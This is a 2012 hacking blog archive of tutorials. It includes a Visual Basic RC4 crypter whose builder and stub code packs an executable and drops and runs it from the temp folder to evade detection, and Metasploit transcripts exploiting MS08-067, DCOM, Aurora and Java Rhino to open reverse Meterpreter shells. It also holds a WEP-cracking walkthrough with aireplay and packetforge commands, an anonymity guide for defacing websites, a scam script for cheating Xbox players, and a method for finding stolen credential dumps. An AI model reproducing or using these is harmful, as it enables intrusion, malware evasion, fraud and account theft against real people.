Monday, 23 April 2012

Nessus 5.0 is here [Download]

Tenable has released new version of Nesuss, 5.0

[Image: 1_Nessus5_HostSummary.png]


Quote:Nessus® is the world’s most widely-deployed vulnerability and configuration assessment product with more than five million downloads to date. Nessus 5.0 features high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture with features that enhance usability, effectiveness, efficiency, and communication with all parts of your organization.

Downlad here
Read More

Friday, 20 April 2012

Hello All,
I know all of you are scared to hack/deface a website without taking precautions.
Most of you must not be having a good VPN which is paid and secure enough to do illegal stuffs. So today i will teach you how to stay completely secure without using any VPN :)

So first ,i would just tell some problems of free VPN's

  • They are slow and contain ads in most cases
  • Limited number of proxies
  • Very insecure
  • Store logs
  • Easily Traceable using Logs
  • Even when they say they do not store logs,they do it
  • They are not reliable


Tools Needed

TOR
PuTTY

TOR
Free software implementation of second-generation onion routing, a system enabling its users to communicate anonymously on the Internet.
[Image: BtjCF.jpg]

PuTTY
PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator.
[Image: sNV6l.jpg]

  • Open PuTTY.
  • In The Category, choose Session.
  • In the Host Name,Type shellmix.com.
  • Type Port as 30.
  • Connection Type : SSH.
  • Now Click Open.
  • A Black Window will appear.
  • Enter Username and password as "newuser" [Password appears blank but its typed]
[Image: YuNz9.jpg]

  • A Black Window Appears
  • Now enter a Login Name.
  • Enter a Password.
  • Enter another password For MySQL Database.
  • Enter Email Address.
  • Choose Editor and Enter pico.
  • Choose language : Enter us.
  • Choose Vhost : Enter shell.
  • Enter HDD : Enter hdd1 or hdd2.
  • Now press Enter to Continue.
  • Now ,your shell account is ready.Make sure you remember the username and password you created.
[Image: klygl.jpg]


SSH TUNNELING
  • Re-Open PuTTY.
  • Hostname : shellmix.com.
  • Port : 22.
  • Now in category on the left,choose SSH.
  • Expand it and select Tunnel.
  • Destination : Dynamic.
  • Port : Any random port. (Example : 4545)
  • Click Add.


  • Click Open.
  • Enter Login name and Password that you created earlier
  • Leave this window open
  • Open TOR
  • Click Firefox > Options > Advanced > Network > Settings
  • Click Manual Proxy Configuration
  • Socks Host : 127.0.0.1
  • Port : 4545 (The port you used earlier in PuTTY)
  • Click OK
  • SSH Tunnel Is Ready.Go to http://www.ip2location.com/ and verify your fake IP
[Image: zuh6d.jpg]
[Image: IRy7H.jpg]



Thanks for reading my tutorial
Read More

Saturday, 14 April 2012

TUT] How To Make a crypter ...[Personal]

How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain


The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion


1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.

Code:

Quote:With commondlg 'CommonDialog1.
.Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
.DialogTitle = "Please select a executable file..." 'The title of the dialog.
.ShowOpen 'Show the dialog.
End With
TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Quote:Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.

Code:
Quote:Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "GauravRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Quote:Const FileSplit = "<@#@>" 'The file split.
Const Pass = "GauravRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable:Here
RC4 module: Here
Read More

Friday, 13 April 2012

How To Scam Microsoft Points

This Works Best on Call Of Duty: Modern Warfare 2
I Have made 7500ms points by doing this (In Oceania we have 1500 & 3000 microsoft point cards not 1600)

First things First

You need an account that is 10th Prestige and it helps to have a few friends that are level 70 in ay prestige
With your friends, Each search in different Game types and when you have a full recent players list send a Message to them all saying something along the lines of
'Hosting a 10th Prestige lobby, All titles emblems challenges and attachments message back for prices and more details.'
Keep searching untill you have at least 10 replies saying 'How much' or 'Im interested'

When people have replied Invite them into a party that has you and some loyal friends in.

tell them,
It is a 10th prestige lobby it's 1500msp for you and 2 friends so thats 500msp each or $25 paypal, with this you get all challenges all titles and emblems colored custom class names and even IW,FUCK clan tags.
Sometimes they will ask if you can do it for free, tell them that if they find someone that will pay you then they can get into the lobby as well
even with your friends searching for payers it can sometimes take up to 2 hours to find 3 people that will pay you microsoft points
If you don't have as many people as you would like paying, Tell them that you will be hosting tomorrow because you havn't been able to buy a KV yet but you should be able to get one for tomorrow
Just repeat the previous steps untill you have enough players.
Note you can Host up to 18 People in your lobby (but minus you and your 'co host' you have 16 spots left and each person gets to bring in 2-4 friends)

Questions people Will/Might Ask you


Q:What Type of JTag do you have?

A:Xenon (pronounced Zee non)

Q: What type of KV Does it take?

A:Type 1 or 2

Q:What type of Freeboot do you Have?

A: I don't run free boot, I use a Paid booter (I am Still working on this answer because i have not scammed in a while and i'm pretty sure freeboot does not work with all the updates)

Most answers can be found by googleing anyway


Not Perfect I know and maybe a little hard to understand But i will Keep updating this guide
Read More
1. Go here : Here is Link
Then fill out the form like this, put all fake info. Nothing needs to be legit. Once you hit submit the code is given to you so you do not need to put legit information.
Form Should Look Like This:
[Image: screenshot20110329at546.png]
2. Now for this password it will keep failing because it is not secure, so you this as the password.
Password: Password1!
The PW must be 10 characters, have One CAPS letter, a Number, and a special character like these : !@#$%&*.
For quick results just use the example PW I provided.
Press submit and you should see this:
[Image: screenshot20110329at547n.png]
Enjoy!
Note that code in the picture is up grabs: )
Read More

How to Play your xbox through your laptop


1)
Purchase and install a video capture card on your laptop. Video capture cards are designed so users can input signals typically used for TV connections on their laptops; in this case, you'll connect your Xbox 360's video outputs to your computer.

2 )
Install any drivers that came with the video capture card. These drivers should be downloadable from the manufacturer's website and on an installation disc that came with the card.

3 )
Connect your Xbox 360 to the video capture card in the same way you would connect it to a TV or monitor. Connect the component or HD plugs to your Xbox 360, then connect the inputs to your video capture card.

4 )
Turn on your computer. Start the multimedia program used by your video capture card--likely Windows Media Player or Quicktime.

5 )
Turn on the Xbox 360. If connected properly, the Xbox 360's video output should appear on your laptop


Tip:

Computer monitors typically offer higher resolutions than large tube-based TVs. If you're having trouble reading text in your Xbox 360 games, reduce the resolution of your display in the Control Panel.
Read More

Xbox Live Membership Codes[Takes10Secs]

First off, go to this link: Website

Scroll down, and click on the red arrow:

Once you've done that, click on the white XBOX LIVE symbol on the next page:

[Image: 9d72f5.png]

It will now log you into your Windows Live ID. And once you're logged in, you will see two codes.
[Image: 2b65c3.png]

The first one is the 48h trial, the second one is useless for American and European accounts.

It should look like this:

Please note:
As far as I know, the codes only work for SILVER accounts. Don't even bother trying to redeem them on a gold account as it won't work.
Here is some proof:
[Image: f09383.png]

Enjoy
Read More

[TuT] Metasploit Ultimate [TuT]☆

[Image: VZySS.jpg]
[Image: JYUpu.jpg]
More info:
Code:
Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.

  Name: Microsoft Server Service Relative Path Stack Corruption
  Module: exploit/windows/smb/ms08_067_netapi
    Version: 14319
   Platform: Windows
Privileged: Yes
    License: Metasploit Framework License (BSD)
  Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  10  Windows 2003 SP1 Japanese (NO NX)
  11  Windows 2003 SP2 English (NO NX)
  12  Windows 2003 SP2 English (NX)
  13  Windows 2003 SP2 German (NO NX)
  14  Windows 2003 SP2 German (NX)
  15  Windows XP SP2 Arabic (NX)
  16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  17  Windows XP SP2 Chinese - Simplified (NX)
  18  Windows XP SP2 Chinese - Traditional (NX)
  19  Windows XP SP2 Czech (NX)
  2   Windows XP SP0/SP1 Universal
  20  Windows XP SP2 Danish (NX)
  21  Windows XP SP2 German (NX)
  22  Windows XP SP2 Greek (NX)
  23  Windows XP SP2 Spanish (NX)
  24  Windows XP SP2 Finnish (NX)
  25  Windows XP SP2 French (NX)
  26  Windows XP SP2 Hebrew (NX)
  27  Windows XP SP2 Hungarian (NX)
  28  Windows XP SP2 Italian (NX)
  29  Windows XP SP2 Japanese (NX)
  3   Windows XP SP2 English (AlwaysOn NX)
  30  Windows XP SP2 Korean (NX)
  31  Windows XP SP2 Dutch (NX)
  32  Windows XP SP2 Norwegian (NX)
  33  Windows XP SP2 Polish (NX)
  34  Windows XP SP2 Portuguese - Brazilian (NX)
  35  Windows XP SP2 Portuguese (NX)
  36  Windows XP SP2 Russian (NX)
  37  Windows XP SP2 Swedish (NX)
  38  Windows XP SP2 Turkish (NX)
  39  Windows XP SP3 Arabic (NX)
  4   Windows XP SP2 English (NX)
  40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  41  Windows XP SP3 Chinese - Simplified (NX)
  42  Windows XP SP3 Chinese - Traditional (NX)
  43  Windows XP SP3 Czech (NX)
  44  Windows XP SP3 Danish (NX)
  45  Windows XP SP3 German (NX)
  46  Windows XP SP3 Greek (NX)
  47  Windows XP SP3 Spanish (NX)
  48  Windows XP SP3 Finnish (NX)
  49  Windows XP SP3 French (NX)
  5   Windows XP SP3 English (AlwaysOn NX)
  50  Windows XP SP3 Hebrew (NX)
  51  Windows XP SP3 Hungarian (NX)
  52  Windows XP SP3 Italian (NX)
  53  Windows XP SP3 Japanese (NX)
  54  Windows XP SP3 Korean (NX)
  55  Windows XP SP3 Dutch (NX)
  56  Windows XP SP3 Norwegian (NX)
  57  Windows XP SP3 Polish (NX)
  58  Windows XP SP3 Portuguese - Brazilian (NX)
  59  Windows XP SP3 Portuguese (NX)
  6   Windows XP SP3 English (NX)
  60  Windows XP SP3 Russian (NX)
  61  Windows XP SP3 Swedish (NX)
  62  Windows XP SP3 Turkish (NX)
  63  Windows 2003 SP2 Japanese (NO NX)
  7   Windows 2003 SP0 Universal
  8   Windows 2003 SP1 English (NO NX)
  9   Windows 2003 SP1 English (NX)

Basic options:
  Name  Current Setting  Required  Description
  ----  --  --  --
  RHOST  yes  The target address
  RPORT    445    yes  Set the SMB service port
  SMBPIPE  BROWSER    yes  The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 400
  Avoid: 8 characters

Example:
Code:
II    dTb.dTb  _.---._
  II  4'  v  'B   .'"".'/|`.""'.
  II  6.  .P  :  .' / |  `.  :
  II  'T;. .;P'  '.'  /  |    `.'
  II  'T; ;P'    `. /   |    .'
II  'YvP'  `-.__|__.-'

I love shells --egypt

  =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
  =[ svn r14663 updated today (2012.01.31)

msf > use windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf  exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf  exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)
[Image: XlPRp.jpg]
Dcerpc Example:
Code:
msf > use exploit/windows/dcerpc/ms03_026_dcom

msf  exploit(ms03_026_dcom) > set rhost 192.168.2.105

rhost => 192.168.2.105
msf 
exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(ms03_026_dcom) > set lport 4443

lport => 4443

msf  exploit(ms03_026_dcom) > set lhost 192.168.2.103

lhost => 192.168.2.103

msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.2.103:4443

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...

[*] Sending exploit ...

[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Aurora Example:

Code:
msf > search aurora

Matching Modules
==

   Name  Disclosure Date  Rank    Description
   ----  --  ----    --
   exploit/windows/browser/ms10_002_aurora  2010-01-14  normal  Internet Explorer "Aurora" Memory Corruption

msf > use exploit/windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
smsf  exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf  exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf  exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name  Current Setting  Required  Description
   ----  --  --  --
   SRVHOST  192.168.2.103    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80  yes  The local port to listen on.
   SSL  false    no  Negotiate SSL for incoming connections
   SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH    no  The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name  Current Setting  Required  Description
   ----  --  --  --
   EXITFUNC  process    yes  Exit technique: seh, thread, none, process
   LHOST  192.168.2.103    yes  The listen address
   LPORT  4444  yes  The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf  exploit(ms10_002_aurora) > set uripath /
uripath => /
msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Aurora More Info:
Info:
Code:
Name: Internet Explorer "Aurora" Memory Corruption
  Module: exploit/windows/browser/ms10_002_aurora
    Version: 14034
   Platform: Windows
Privileged: No
    License: Metasploit Framework License (BSD)
  Rank: Normal

Provided by:
  unknown
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name  Current Setting  Required  Description
  ----  --  --  --
  SRVHOST  0.0.0.0    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080  yes  The local port to listen on.
  SSL  false    no  Negotiate SSL for incoming connections
  SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH    no  The URI to use for this exploit (default is random)

Payload information:
  Space: 1000
  Avoid: 1 characters

Description:
  This module exploits a memory corruption flaw in Internet Explorer.
  This flaw was found in the wild and was a key component of the
  "Operation Aurora" attacks that lead to the compromise of a number
  of high profile companies. The exploit code is a direct port of the
  public sample published to the Wepawet malware analysis site. The
  technique used by this module is currently identical to the public
  sample, as such, only Internet Explorer 6 can be reliably exploited.

[Image: pDKI0.jpg]

Java Rhino Example:

Code:
II    dTb.dTb  _.---._
  II  4'  v  'B   .'"".'/|`.""'.
  II  6.  .P  :  .' / |  `.  :
  II  'T;. .;P'  '.'  /  |    `.'
  II  'T; ;P'    `. /   |    .'
II  'YvP'  `-.__|__.-'

I love shells --egypt

  =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
  =[ svn r14663 updated today (2012.01.31)

msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf  exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(java_rhino) > set lport 4444
lport => 4444
smsf  exploit(java_rhino) > set uripath /
uripath => /
msf  exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(java_rhino) > show options

Module options (exploit/multi/browser/java_rhino):

   Name  Current Setting  Required  Description
   ----  --  --  --
   SRVHOST  192.168.2.103    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080  yes  The local port to listen on.
   SSL  false    no  Negotiate SSL for incoming connections
   SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH  /    no  The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name  Current Setting  Required  Description
   ----  --  --  --
   EXITFUNC  process    yes  Exit technique: seh, thread, none, process
   LHOST  192.168.2.103    yes  The listen address
   LPORT  4444  yes  The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf  exploit(java_rhino) > set srvport 80
srvport => 80
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012

Java Rhino More Info:
Code:
Name: Java Applet Rhino Script Engine Remote Code Execution
  Module: exploit/multi/browser/java_rhino
    Version: 0
   Platform: Java, Windows, Linux
Privileged: No
    License: Metasploit Framework License (BSD)
  Rank: Excellent

Provided by:
  Michael Schierl
  juan vazquez
  Edward D. Teach <teach@consortium-of-pwners.net>
  sinn3r <sinn3r@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows Universal
  2   Apple OSX
  3   Linux x86

Basic options:
  Name  Current Setting  Required  Description
  ----  --  --  --
  SRVHOST  0.0.0.0    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080  yes  The local port to listen on.
  SSL  false    no  Negotiate SSL for incoming connections
  SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH    no  The URI to use for this exploit (default is random)

Payload information:
  Space: 20480
  Avoid: 0 characters

Description:
  This module exploits a vulnerability in the Rhino Script Engine that
  can be used by a Java Applet to run arbitrary Java code outside of
  the sandbox. The vulnerability affects version 7 and version 6
  update 27 and earlier, and should work on any browser that supports
  Java (for example: IE, Firefox, Google Chrome, etc)

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-3544
  http://www.osvdb.org/76500
  http://www.zerodayinitiative.com/advisories/ZDI-11-305/
  http://schierlm.users.sourceforge.net/CVE-2011-3544.html

Okay so this needs settings similar to aurora. So let's chose java rhino:
Code:
use exploit/multi/browser/java_rhino
Now set payload:
Code:
set payload windows/meterpreter/reverse_tcp
Input Lport, Lhost, and srvhost. Remember, Srvhost and Lhost should match:
Code:
set lhost 192.168.2.103
set lport 4444
set srvhost 192.168.2.103
[Image: JjRp4.jpg]
[Image: 9OtxD.jpg]
Read More

Thursday, 12 April 2012

[TUT] How To Get An Account For Any Website! [TUT]

Go to http://www.Google.com/

In the url/search bar, copy and paste all of the following.

Program: Url/Host: Login: Password: Computer: Date: IP:

Now lets say you want an account for facebook. so after the Url/Host you would write in the facebook website address, just like this:

Program: Url/Host: http://www.facebook.com Login: Password: Computer: Date: IP:

Searching for this will show you dumps on the internet.

A dump is when someone takes all the accounts that they have hacked, and places them on a website so everyone can gain access to them.

You can use this to obtain accounts for any website, but the accounts won’t work all the time, because people may have already changed the login details, depending on how old the dump is.

You will not find logins for every website. For example, if you search for facebook accounts, you are bound to find a lot of them, but if you search for a website that isn’t popular at all, or doesn’t have many users, you probably will not find any dumps.

Hope this Helped.
Read More

Wednesday, 11 April 2012


:||:: Hey Guys.. Sorry for the Last Post. removed... Just deleted the Pics on my last post and I could not edit it after 1440 Minutes... So.. I decided to make a new Post. Its Just the same.. But I think the pics won't hung up on me this time.. lol.. Enjoy!! ::||::

[NOTE: The Information contained in this Article is only Intended for Educational Purposes. I take no Responsibility for the misuse of this information and the harm brought to you or any one else (specially your neighbour.. :)]

Hello Everyone..

This is my First Ever Tutorial at Wireless Hacking... This guide is aimed to help you crack WEP Passwords.. As said, this is a Total n00b Guide to Wireless Hacking..

The Stuff that you are going to need is
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection

Before we Start, I take it for Granted that you are aware of a Few things...

I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.

Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)

Now that we are Ready.. Lets Begin..

If You are Using a Boot CD, As in my case, You will see the folllowing screen when the CD Loads.

[Image: backtrackstartup.png]

Just Select "Start BackTrack FrameBuffer (1024x768)"
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.

What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".

Once, the Startup is Completed you will be at the Desktop of Backtrack

Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
[Image: backtrackstartnetwork.png]

Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.

Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.

In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.

Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0

Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
[Image: airmon1.png]

Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0

What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second

You Might just wanna copy the BSSID as it is going to be used a lot.

Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}


[Image: airodump1.png]

Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.

Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0

Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)

[Image: airodump3.png]

Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay

Its your Lucky day..lol.. I will be going through both.

But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this when the Attack is Successful.

02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)

Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.

[Image: aireplay3.png]

OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER. Out Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.

It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.

[Image: aireplay6.png]

Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it.

Just hit ENTER and there we go, the Packet has been made.

[Image: aireplay8.png]

Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0

